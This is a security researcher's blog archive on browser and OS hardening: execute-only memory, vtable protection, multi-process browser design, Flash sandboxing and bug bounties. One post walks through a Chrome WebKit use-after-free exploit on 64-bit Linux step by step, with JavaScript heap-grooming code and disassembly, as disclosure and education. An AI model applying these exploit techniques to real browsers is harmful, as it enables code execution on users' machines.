Thursday, June 5, 2014

Execute without read

A couple of years ago, during an idle moment, I wondered what we could do if we had the hardware CPU primitive of pages with permissions execute-only (i.e. no read and write): https://twitter.com/scarybeasts/status/174901935340666881

It turns out that aarch64 has exactly such support. Here's support heading in to the Linux kernel:

https://git.kernel.org/cgit/linux/kernel/git/cmarinas/linux-aarch64.git/commit/?h=upstream&id=bc07c2c6e9ed125d362af0214b6313dca180cb08

The original idea was to defeat ROP by having all of the instructions randomized a bit on a per-install basis. You know, the usual tricks such as applying equivalence transforms on the opcode stream. Such an approach would have some obvious downsides such as diagnosability and let's face it, implementing this would also feel a bit hacky. Can we do better?

Maybe we can. The original idea focused on the attacker knowing where the binaries are in virtual address space, but not knowing or being able to read or otherwise predict the content. What if we instead keep the binary content stable but try and make sure the attacker cannot discern the location of the binaries? With enough ASLR entropy, this would be an interesting approach.

For the sake of the exercise, imagine the attacker has the most powerful of bugs: an arbitrary read/write primitive relative to an existing heap location. The attacker can follow heap pointers to the stack, the BSS, vtables, etc. At first, this sounds prohibitively hard to deal with. But for every way the attacker might try to leak the address of the binary, there currently seems to be a solution:

  • The heap is riddled with vtable pointers. If the attacker follows a vtable pointer, they get to read function pointers and the location of the binary is revealed. We fix this in one of two ways: either get sneaky and turn vtables into code (jmp 0xblah) instead of data, and reuse our exec-without-read primitive. Or we burn a register (aarch64 has lots) as a storage for a secret ASLR base for the binary.
  • The heap is riddled with raw function pointers. We can redo function pointers as something like single-slot vtables and use the above trick. We don't want to directly store function pointers in writable memory as a relative position to our secret register, because the attacker could then easily jump to an arbitrary point in the binary.
  • The BSS and data sections are typically stacked adjacent to the binary. We need to not do this, so that pointers into the BSS and data sections do not reveal the location of the binary.
  • The stack contains saved return addresses. These return addresses reveal the address of the binary. And for sure, the heap will contain pointers to the stack from time to time. Separating your stack into control flow and data will sort this out -- perhaps burning another register to keep the control flow stack separate and at a secret location.
  • JIT engines are a pain. And your heap is going to contain chains of pointers leading to the JIT pages. Depending on the type of JIT engine, there are various tricks that can be pulled. Enumerating them here is going to make the post too long. Some of the more amusing tricks including having the kernel ban syscalls from a writable page.
Perhaps at this point we decide that the hacks are piling up and add an indirection to all indirect jumps that uses a secret register for the binary location, and an offset into a table of valid jump locations. (I think this maybe where @comex was heading in a tweet in a discussion today: https://twitter.com/comex/status/474656633281196032)

Such a system isn't going to be invulnerable to memory corruption, but it _is_ going to be a significant pain to attack. The most obvious remaining attack is probably to read a couple of different vtable pointers and interchange them, calling an arbitrary attacker-chosen _existing function_ in the binary. If your binary has function pointers to system() in the heap, you're going to be in trouble. But generally, going after the kernel is going to be hard. Valid functions in your binary are unlikely to have the side effect of calling syscalls with bad parameters.

We also find ourselves wondering if we've sort-of re-implemented something like NaCl, although the performance characteristics and granularity of attacker-chosen code blocks will be different.

Crazy idea? Plausible direction?

[Thanks to Lee Campbell for helping with discussions and this blog post]

Friday, March 21, 2014

Together, we can make a difference

A couple of weeks back, I released a popular spreadsheet which lists many of the Adobe Flash Player 0-days used to harm people in the wild since 2010. I counted 18 and countless kind Twitterers pointed out some I may have missed. It was an interesting exercise, of course with an ulterior motive!

Looking beyond the raw counts, the spreadsheet shouts two items:
  • We should want to make a difference. The harm done from all these 0-days is just a litany of awfulness. We have harm to democracy activists and the human rights organizations that try to help these people. We have harm to American defense interests, aka. espionage. We have harm to corporations, aka. theft and economic damage.
  • We can make a difference! If you look at the data, you'll see 7 memory corruption 0-days in a year, starting mid-2010. After this year, Tavis Ormandy's famous Flash security rampage landed (80+ fixes), with follow-up patches such as 7 fixes here. Almost a year passes between Flash memory corruption 0-days after Tavis' work. You should call him a hero. (You should also call Mateusz Jurczyk, Gynvael Coldwind and Fermin Serna heroes too. They continued Tavis' work, have a look at the CVE count in this Adobe advisory to appreciate their work.)
Whilst it's true that Flash 0-days have seen a resurgence in Dec 2013 - Feb 2014, this does not invalidate the data that the whitehat community made a difference in 2010 - 2011 onwards. If anything, the data suggests that attackers have regrouped and refocused their research efforts to target areas that are still fertile. We can certainly do the same and put down this resurgence.

How you can help make a difference

Join us in the whitehat world. When you entered the greyhat world, they told you you'd be helping catch terrorists, didn't they? Recent and ongoing revelations show that no, in fact the biggest use of your work was enabling mass surveillance, the compromise of foreign nations and even the compromise of foreign corporations. If you want to make an actual difference, see above for where defensive help is needed.

Join us working on Flash and other important software. Many of us are working hard to provide reasonable avenues of reward for those who work on important software in the whitehat community. For example, the Internet Bug Bounty includes Flash as a category. For Flash vulnerabilities where exploitability is near-certain, we're rewarding up to $10,000 -- we have rewarded at this level three times already. We also anticipate $5,000 as a popular reward level for vulnerabilities that are likely exploitable but not proven. I previously blogged about $10,000 example here.

What are you waiting for? Join us and we'll make a difference. You'll get some good coin as a side-effect.

Thursday, February 20, 2014

Internet Bug Bounty issues its first $10,000 reward

One of my side projects is as an adviser and panelist for the non-profit Internet Bug Bounty (IBB). We recently added Adobe Flash Player as in scope for rewards.

Earlier today, David Rude collected $10,000 for a vulnerability recently fixed in APSB13-28. My thoughts on this are too long to fit into a tweet, so I summarize them here:

  • This shows that the IBB is serious about rewarding research which makes us all safer. $10,000 is a respectable reward by modern bug bounty program standards. It is also shows that when we give the reward range as "$2000 - $5000+", we are serious about that little plus character!
  • David Rude is a hero. This vulnerability was found being exploited in the wild. Recent research by Citizen Lab has linked the exploit to a morally dubious company, targeting of journalists and regimes with poor human rights records. Getting this bug fixed is a service to all internet users, democracy and human rights.
  • The IBB culture is to err on the side of paying. Note that David did not discover the vulnerability himself; he discovered someone else using it. IBB culture is to look mainly at whether a given discovery or piece of research helped make us all safer. Our aim is to motivate and incentivize any high-impact work that leads to a safer internet for all.
  • The vulnerability was never in fact reported to IBB! Wait, wut? It's true. The vulnerability went via Adobe's standard channels. IBB does not want or need details of unfixed vulnerabilities -- that would violate strict need-to-know handling. Once a public advisory and fix is issued, researchers or their friends may file IBB bugs to nominate their bugs for reward. Or, for important categories such as Flash or Windows / Linux kernel bugs, panel members keep an eye out for high impact disclosures and nominate on the researchers' behalf. Because we care.
Join us for the common good of a safer internet. You can help by doing your research in the open, targeting high-impact vulnerabilities or even becoming a new corporate sponsor. If we all pull together we can make a difference.

Sunday, December 29, 2013

vtable protections: fast and thorough?

Recently, there's been a reasonable amount of activity in the vtable protection space. Most of it is compiler-based. For example, there's the GCC-based virtual table verification, aka. VTV. There are also multiple experiments based on clang / LLVM and of course MSVC's vtguard. In the non-compiler space, there's Blink's heap partitioning, enabled by PartitionAlloc.

It seems, though, that these various techniques require the user to choose between "fast" or "thorough protection". This isn't ideal. Shortly, I'll document my own idea for how to try and get both fast and thorough. But first, a recap on what we mean by fast and thorough.

Fast vtable protection

Protecting vtables typically involves inserting machine instructions around vtable pointer load or virtual calls. Going fast is simple: only insert a very small number of fast instructions (i.e. no hard-to-predict branches). This is the approach taken by vtguard. If you look at page 14 in the vtguard PDF linked above, you'll see that there's just a single cmp and a single jne (short, and never taken in normal execution) added to the hot path.

Tangentially, another task commonly undertaken when adding vtable protections to a given program is to remove as many virtual calls as possible, by annotating classes and methods with the "final" keyword and/or applying whole-program optimizations.

Thorough vtable protection

Describing what we want in a thorough vtable protection is a little more involved. We want:

  • Defeating ASLR does not defeat the vtable check. (vtguard lacks this property, whereas the GCC implementation has it.)
  • Only a valid vtable pointer can be used.
  • Furthermore, only a vtable pointer corresponding to the correct hierarchy for the call site can be used. 
  • Ideally, only a vtable pointer corresponding to the correct hierarchy level for the call site can be used.

A fast solution for thorough vtable protection?

How can we get all of the protections above and get them fast? My idea revolves around separating the problem into two pieces:

  1. Work out whether we can trust the vtable pointer or not.
  2. Validate that the class type represented by the vtable pointer is appropriate for the call site.
To trust or not to trust?

Current schemes trust the vtable pointer or not, based either on an some secret (vtguard, xor-based LLVM approach), a fixed table of valid values (GCC, some LLVM approaches) or by constraining values that might appear in the vtable position (heap partitioning).

The new scheme would be to reserve a certain portion of the address space for vtables. We know that nothing else can be mapped there, so by suitably masking any proposed vtable pointer, we know it is valid. I haven't fully thought this through for 32-bit, but look at this 64-bit variant:
  • Host vtables in the lower 4GB of address space.
  • Use the dereference of a 32-bit register to load the vtable entry. This provides masking for free and even saves a byte in the instruction sequence. It works because loading 4-bytes into a 64-bit register zero extends the result.
  • Optionally, save memory by having the compiler use 4-byte vtables.

This scheme is approximately free, maybe even performance positive in some situations. Furthermore, one possible implementation is to stop somewhere around here for a very fast protection scheme that is "ok" in thoroughness.

On the downside, you've lost the 64-bit invariant that "nothing is mapped in the bottom 4GB", but the percentage of space used is going to be small. If that bothers us, then we can use the same trick to load a 4-byte vtable pointer and then "or" it with 0x100000000 (use bts if you dare) or some other value.

Validating class type

Once you know you trust your vtable pointer, validating the class type becomes a lot simpler. Instead of messing with secrets inside the vtable, you can just store a compact representation of the class type inside the vtable, with the aim of satisfying validation needs with a single compare.

The one trick we want to play is to make it easy to validate various different positions in a class hierarchy with minimal work. To do this, we can store class details in a hierarchical format. To take a simple case, imagine that we have the following classes in the system:

A1, A1:B1, A2, A2:B1, A2:B1:C1

We encode these using one byte per hierarchy level, the basemost class being the LSB: 00000001, 00000101, 00000002, 00000102, 00010102. (Note that this will be an approximation. For example, if you have more than 256 basemost classes with virtual functions, you would need to represent the first level with 2 or more bytes.)

Finally, our "is this object of the correct type for the callsite?" check becomes a simple compare. Depending on the position in the hierarchy, we may be able to achieve the compare with no masking and therefore a single instruction.

For example, for a call site expecting an object of type A1, it's just "cmpb $1, (%eax)". That's a 4-byte sequence, which is much shorter than the 10-byte sequence noted in the vtguard PDF. For a call site expecting an object of type A2:B1, it's "cmpw $0x102, (%eax)".

Closing notes

Will it work well? Who knows. I haven't had time to implement this, nor am I likely to in the near future. Feel free to take this and run with it.

Note that this idea doesn't cover what to do with raw function pointer calls. If you want to head towards complete control flow integrity, you'll want to look at protecting those, as well as return addresses (the current canary-based stack defenses do nothing against an arbitrary read/write primitive).

Sunday, February 3, 2013

Exploiting 64-bit Linux like a boss

Back in November 2012, a Chrome Releases blog post mysteriously stated: "Congratulations to Pinkie Pie for completing challenge: 64-bit exploit".

Chrome patches and autoupdates bugs pretty fast but this is a WebKit bug and not every consumer of WebKit patches bugs particularly quickly. So I've waited a few months to release a full breakdown of the exploit. The exploit is notable because it is against 64-bit Linux. 64-bit exploits are generally harder than 32-bit exploits for various reasons, including the fact that some types of heap sprays are off the table. On top of that, Linux ASLR is generally better than Windows ASLR (although not perfect). For example, Pinkie Pie's Pwnium 2 exploit defeated Win 7 ASLR by relying on a statically-addressed system object! That sort of nonsense is generally absent from Linux ASLR.

Without any further ado, I'll paste my raw notes from the exploit deconstruction below. The number of different techniques used and steps involved is quite impressive.

The bug
A single WebKit use-after-free bug was used to gain code execution. The logic flaw in WebKit was reasonably simple: when a WebCore::HTMLVideoElement is garbage collected, the base class member WebCore::HTMLMediaElement::m_player -- a WebCore::MediaPlayer -- is freed. A different object, a WebCore::MediaSource, holds a stale pointer to the freed WebCore::MediaPlayer. The stale pointer can be prodded indirectly via Javascript methods on either the JS MediaSource object, or JS SourceBuffer objects owned by the JS MediaSource.

The exploit
The exploit is moderately complicated, with multiple steps and techniques used. Pinkie Pie states that the complexity is warranted and generally caused by limited lack of control, and therefore limited options for making progress at each stage.

The exploit steps are as follows:

1. Allocate a large number of RTCIceCandidate objects (100000) and then unreference a small subset of them.
   tempia = new Uint32Array(176/4);
   rtcs = [];
   rtcstring = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa';
   rtcdesc = {'candidate': rtcstring, 'sdpMid': rtcstring}
   for(var i = 0; i < 100000; i++) {
       rtcs.push(new RTCIceCandidate(rtcdesc));
   }
   for(var i = 0; i < 10000; i++) rtcs[i] = null;
   for(var i = 90000; i < 100000; i++) rtcs[i] = null;

This step indirectly creates a lot of WebCore::WebCoreStringResource (v8 specific) objects and a later garbage collection will free some subset of them.
These objects are 24 bytes in size (fitting into a tcmalloc slab of 32 byte sized allocations), so it means that any future 24 byte allocation has a large probability of being placed directly before a WebCore::WebCoreStringResource object. This is significant later.
A 176-byte sized buffer is also allocated.

2. Trigger free of MediaPlayer and the 176-byte sized buffer; allocate another MediaSource object.
   buffer = ms.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid.parentNode.removeChild(vid);
   vid = null;
   gc();
   tempia = null;
   gc();
   ms2 = new WebKitMediaSource();

   sbl = ms2.sourceBuffers;
The WebCore::MediaPlayer is 264 bytes in size (tcmalloc bucket 257 - 288). When it is freed, many child objects are also freed. The only important one is a 168 byte sized WebKit::WebMediaPlayerClientImpl object (tcmalloc bucket 161 - 176).
Allocation of the WebCore::MediaSource (176 bytes) also subsequently allocates a WebCore::SourceBufferList child object (168 bytes). The free of the temporary 176 byte buffer (tempia) is to ensure that its freed slot is used for the WebCore::MediaSource object, leaving the freed slot that was occupied by a WebKit::WebMediaPlayerClientImpl to be occupied by a new WebCore::SourceBufferList object.

3. Call vtable of freed WebMediaPlayerClientImpl.
   buffer.timestampOffset = 42; // free
In C++, this triggers the call chain WebCore::SourceBuffer -> WebCore::MediaSource -> WebCore::MediaPlayer -> (virtual) WebKit::WebMediaPlayerClientImpl.
You’ll notice that the call chain bounces through the WebCore::MediaPlayer, which is freed. However, the only access is to the WebCore::MediaPlayer::m_private member at offset 72. delete’ing the object only interferes with the first 16 bytes (on account of tcmalloc writing two freelist pointers) and the WebCore::MediaPlayer::m_mediaPlayerClient member. The WebCore::MediaPlayer free slot isn’t otherwise meaningfully re-used by this point.

What happens next is fascinating. WebCore::MediaPlayer::sourceSetTimestampOffset dissassembles to:
   0x00007f61a0ced4c0 <+0>: mov    rdi,QWORD PTR [rdi+0x48]
   0x00007f61a0ced4c4 <+4>: mov    rax,QWORD PTR [rdi]
   0x00007f61a0ced4c7 <+7>: mov    rax,QWORD PTR [rax+0x208]
   0x00007f61a0ced4ce <+14>: jmp    rax

This loads the vtable for the WebCore::MediaPlayer::m_private member and calls the vtable function at 0x208. WebCore::MediaPlayer::m_private is supposed to be a WebKit::WebMediaPlayerClientImpl object but a WebCore::SourceBufferList was overlayed there. WebCore::SourceBufferList objects have a vtable, but a much smaller one! Offset 0x208 in this vtable hits a vtable function in a totally different vtable, specifically WebCore::RefCountedSupplement::~RefCountedSupplement, which disassembles to:
   0x00007ffd9ec51e00 <+0>: lea    rax,[rip+0x3276969]
   0x00007ffd9ec51e07 <+7>: mov    QWORD PTR [rdi],rax
   0x00007ffd9ec51e0a <+10>: jmp    0x7ffd9e5b2c80 <
WTF::fastFree(void*)>

As these opcodes execute, rdi is a this pointer for a WebCore::SourceBufferList object (which the calling code believed was a this pointer to a WebKit::WebMediaPlayerClientImpl object). As you can see, the side effects of these opcodes are:
- Trash the vtable pointer of the WebCore::SourceBufferList object.
- Do a free(this), i.e free the WebCore::SourceBufferList object.
- Return cleanly to the caller.

4. Use HTML5 WebDatabase functionality to allocate a SQLStatement as a side effect.
   transaction.executeSql('derp', [], function() {}, function() {});
   slength = sbl.length;
A WebCore::SQLStatement object is 176 bytes in size. So it is allocated into the slot just vacated by free’ing the WebCore::SourceBufferList object in step 3 above. This is the same slot that we free’d the WebKit::WebMediaPlayerClientImpl from.
There are now two Javascript objects pointing to freed objects: a direct handle to a freed WebCore::SourceBufferList (sbl) and an indirect handle to a freed WebKit::WebMediaPlayerClientImpl (buffer).
At this time, a call is made in Javascript to sbl.length. It is not required for the exploit and nothing is done with the integer result, but looking at this call under the covers is instructive.
To return the length, a 64-bit size_t is read from offset 136 into the WebCore::SourceBufferList object. Since a WebCore::SQLStatement was put on top of the freed WebCore::SourceBufferList, the actual value read is a WebCore::SQLStatement::m_statementErrorCallbackWrapper::m_callback member pointer. Leaking this value to Javascript might be useful as it is a heap address. However, Javascript lengths are 32-bit so only the lower 32-bits of the address are leaked. The entropy that’s important for ASLR on 64-bit Linux is largely in the next 8 bits above the bottom 32 bits, so the heap address cannot be usefully leaked!
Exploitation of similar overlap situations would not be a problem on systems with 32-bit pointers.

5. Abuse overlapping fields in SourceBufferList vs. SQLStatement.
   sb = sbl[0xa8/8];
Next, the Javascript array index operator is used. At this time, the Javascript handle to the WebCore::SourceBufferList is actually backed by a WebCore::SQLStatement object at the C++ level. The WebCore::SourceBufferList::m_list member is a WTF::Vector and that starts with two important 64-bit fields: a length and a pointer to the underlying buffer.
As covered above, the length now maps to a pointer value. A pointer value, when treated as an integer, will be very large, effectively sizing the vector massively. And the vector’s underlying buffer pointer now maps to the member SQLStatement::m_statementErrorCallbackWrapper::m_scriptExecutionContext.

Therefore, the Javascript array operator on JS SourceBufferList will return a JS SourceBuffer object which is backed in C++ by a pointer pulled from somewhere in a C++ WebCore::ScriptExecutionContent object, depending on the array index.

The exploit uses array index 21, which corresponds to offset 168, or WebCore::ScriptExecutionContext::m_pendingExceptions. This is a pointer to a WTF::Vector. So, there is now a Javascript handle to a JS SourceBuffer object which is really backed by a WTF::Vector.

6. Read vtable value as a Javascript number.
   converterF64[0] = sb.timestampOffset;
In C++, the timestampOffset property is read from a 64-bit double at offset 32 of the WebCore::SourceBuffer object. The WebCore::SourceBuffer object is currently backed by a WTF::Vector object, which is 24 bytes in size and lives in a 32 byte tcmalloc slot. Therefore, a read at offset 32 will in fact read from the beginning of the next tcmalloc slot. Looking back to step 1, it was arranged to be likely that the adjacent 32 byte slot will contain a WebCore::WebCoreStringResource object. Therefore, the WebCore::WebCoreStringResource vtable is read and returned to Javascript as a number. Javascript numbers are 64-bit doubles so there are no truncation issues like those discussed with reading an integer length above in step 4.

That’s a lot of effort, but finally the exploit has leaked a vtable value to Javascript. For a given build of Chrome, it is now easy to calculate the exact address of all opcodes, functions, etc. in the binary.

7. Re-trigger use-after-free and back freed object with array buffer.
   buffer2 = ms3.addSourceBuffer('video/webm; codecs="vorbis,vp8"');
   vid2.parentNode.removeChild(vid2);
   vid2 = null;
   gc();
   var ia = new Uint32Array(168/4);
   rtc2 = new webkitRTCPeerConnection({'iceServers': []});
This time, the freed WebKit::WebMediaPlayerClientImpl is replaced with a 168 raw byte buffer that can be read and written through Javascript. This is now a useful primitive because ASLR was defeated and a useful vtable pointer value can be put in the first 8 bytes of the raw byte buffer.
A WebCore::RTCPeerConnection is also allocated (264 bytes) to occupy the slot for the freed WebCore::MediaPlayer. This protects the freed WebCore::MediaPlayer from corruption. Significantly, it makes sure nothing overwrites the WebCore::MediaPlayer::m_private pointer. This pointer is needed intact. It is at offset 72 and WebCore::RTCPeerConnection does not overwrite that field during construction.

8. Leak address of a heap buffer under Javascript control.
   add64(converterI32, 0, converterI32, 0, -prepdata['found_vt']);
   add64(ia, 0, converterI32, 0, prepdata['mov_rdx_112_rdi_pp']);
   add64(ia, 0, ia, 0, -0x1e8);
   var ib8 = new Uint8Array(0x10000);
   var ib = new Uint32Array(ib8.buffer);
   buffer2.append(ib8);
   var ibAddr = [ia[112/4], ia[112/4 + 1]];
Using knowledge of the binary layout, a vtable value is chosen that will result in the WebCore::MediaPlayer::sourceAppend vtable call site calling the function v8::internal::HStoreNamedField::SetSideEffectDominator. An appropriate function name. It disassembles to:
   0x00007f153efd7340 <+0>: mov    QWORD PTR [rdi+0x70],rdx
   0x00007f153efd7344 <+4>: ret    
As can be seen, the value of rdx (the 2nd non-this function parameter) is written to offset 112 of this. this is backed by a raw buffer pointer for the ia Javascript Uint32Array and rdx in the context of WebCore::MediaPlayer::sourceAppend is a raw buffer pointer for the ib Javscript Uint32Array.
Therefore, the address of a heap buffer under the control of Javascript has been leaked to Javascript.

9. Proceed as normal.
The exploit now has control over a vtable pointer. It can point the vtable pointer at a heap buffer where the contents can be controlled arbitrarily. The exploit is free to start ROP chains etc.
As it happens, the exploit payload is expressed in terms of valid full function calls. This is achieved by bouncing into a useful sequence of opcodes in a template base::internal::Invoker<3>:
   0x00007f153fc71d40 <+0>: mov    rax,rdi
   0x00007f153fc71d43 <+3>: lea    rcx,[rdi+0x30]
   0x00007f153fc71d47 <+7>: mov    rsi,QWORD PTR [rdi+0x20]
   0x00007f153fc71d4b <+11>: mov    rdx,QWORD PTR [rdi+0x28]
   0x00007f153fc71d4f <+15>: mov    rax,QWORD PTR [rax+0x10]
   0x00007f153fc71d53 <+19>: mov    rdi,QWORD PTR [rdi+0x18]
   0x00007f153fc71d57 <+23>: jmp    rax
As can be seen, these opcodes pull a jump target, a new this pointer and two function arguments from the current this pointer. A very useful construct.

Monday, September 24, 2012

The joys and hazards of multi-process browser security

Web browsers with some form of multi-process model are becoming increasingly common. Depending on the exact setup, there can be significant consequences for security posture and exploitation methods.

Spray techniques

Probably the most significant security effect of multi-process models is the effect on spraying. Spraying, of course, is a technique where parts of a processes' heap or address space are filled with data helpful for exploitation. It's sometimes useful to spray the heap with a certain pattern of data, or spray the address space in general with executable JIT mappings, or both.

In the good ol' days, when every part of the browser and all the plug-ins were run in the same process, there were many possible attack permutations:

  • Spray Java JIT pages to exploit a browser bug.
  • Spray Java JIT pages to exploit a Flash bug.
  • Spray Flash JIT pages to exploit a browser bug.
  • Spray Java JIT pages to exploit Java.
  • You could even spray browser JS JIT pages to exploit Java if you wanted to ;-)
  • ...etc.

Since the good ol' days, various things happened to lock all this down:

  • The Java plug-in was rearchitected so that it runs out-of-process in most browsers.
  • IE and Chromium placed page limits on JavaScript-derived JIT pages (covered a little in the famous Accuvant paper.)
  • Firefox introduced its out-of-process plug-ins feature (for some plug-ins, most notably Flash) and Chromium had all plug-ins out-of-process since the first release.

The end result is trickier exploitation, although it's worth noting that one worrysome combination remains: IE still runs Flash in-process, and this has been abused by attackers in many of the recent IE 0days.

One-shot vs. multi-shot

The terms "one-shot" and "multi-shot" have long been used in the world of server-side exploitation. "One-shot" refers to a service that is dead after just one crash -- so your exploit had better be reliable! "Multi-shot" refers to a service whereby it remains running after your lousy exploit causes a crash. This could be because the service has a parent process that launches new children if they die or it could simply be because the service is launched by a framework that automatically restarts dead services.

Although moving to a multi-process browser is generally very positive thing for security and stability, you do run the risk of introducing "multi-shot" attacks.

In other words, let's say your exploit isn't 100% reliable. Wouldn't it be nice if you could just use a bit of JavaScript to run the exploit over and over in a child process until it works? Perhaps you simply weren't able to default ASLR and you're in the situation where you have a 1/256 chance of your hard-coded address being correct. Again, this could be brute-forced in a "multi-shot" attack.

The most likely "multi-shot" attacks are against plug-ins that are run out-of-process, or against browser tabs, if browser tabs can have separate processes.

These attacks can be defended against by limiting the rate of child process crashes or spawns. Chromium deploys some tricks in this area.

Broker escalation

Once an attack has gained code execution inside a sandbox, there are various directions it might go next. It might attack the OS kernel. Or for the purposes of this discussion, it might attack the privileged broker. The privileged broker typically runs outside of the sandbox, so any memory corruption vulnerability in the broker is a possible avenue for sandbox escape.

To attack the memory corruption bug, you'll likely need to defeat DEP / ASLR in the broker process. An interesting question is, how far along are you already, by virtue of code execution in the sandboxed process? Obviously, you know the full memory map layout of the compromised sandboxed process.

The answer, is it depends on your OS and the way the various processes relate to each other. The situation is not ideal on Windows; due to the way the OS works, certain system-critical DLLs are typically located at the same address across all processes. So ASLR in the broker process is already compromised to an extent, no matter how the sandboxed processes are created. I found this interesting.

The situation is better on Linux, where each process can have a totally different address space layout, including system libraries, executable, heap, etc. This is taken advantage of by the Chromium "zygote" process model for the sandboxed processes. So a compromise of a sandboxed process does not give any direct details about the address space layout of the broker process. There may be ways to leak it, but not directly, and /proc certainly isn't mapped in the sandboxed context! All this is another reason I recommend 64-bit Linux running Chrome as a browsing platform.

Wednesday, July 4, 2012

Chrome 20 on Linux and Flash sandboxing

[Very behind on blog posts so time to crank some out]

A week or so ago, Chrome 20 was released to the stable channel. There was little fanfare and even the official Chrome blog didn't have much to declare apart from bugfixes.

There were some things going on under the hood for the Linux platform, though. Security things, and some of them I implemented and am quite excited by.

The biggest item is an improvement to Flash security. Traditionally, Linux -- across all browsers -- hasn't had great Flash security, due to lack of sandboxing options. That just changed: so-called Pepper Flash shipped to the stable channel on Linux with Chrome 20 (other platforms to follow real soon). I went into a little detail about the technical sandbox measures in Pepper Flash for Linux in an older blog post.

As mentioned in the previous blog post, native 64-bit Flash also gives a useful security boost on 64-bit Linux platforms.

There's more. Perhaps you're running 64-bit Ubuntu 12.04? Courtesy of Kees Cook, this release sneaked in Will Drewry's seccomp filter patches, which I blogged about earlier this year in the context of vsftpd-3.0.0's usage of seccomp filter sandboxing.

So why have just one Flash sandbox if you can have two? A bit of double-bagging if you like. Assuming you're running 64-bit Ubuntu 12.04 and Chrome 20 or newer, you'll also have a seccomp filter policy slapped on Flash -- in additional to the chroot() and PID namespace. This may impede attackers trying to perform a local privilege escalation, who can no longer call crazy brand-new syscalls or use socket() to load crazy protocol modules, etc.

No sandbox or combination of sandboxes will ever be perfect, but "some" is better than "none". For people who want to run Flash, Chrome 20 on 64-bit Ubuntu 12.04 is one of the more locked-down ways to do it.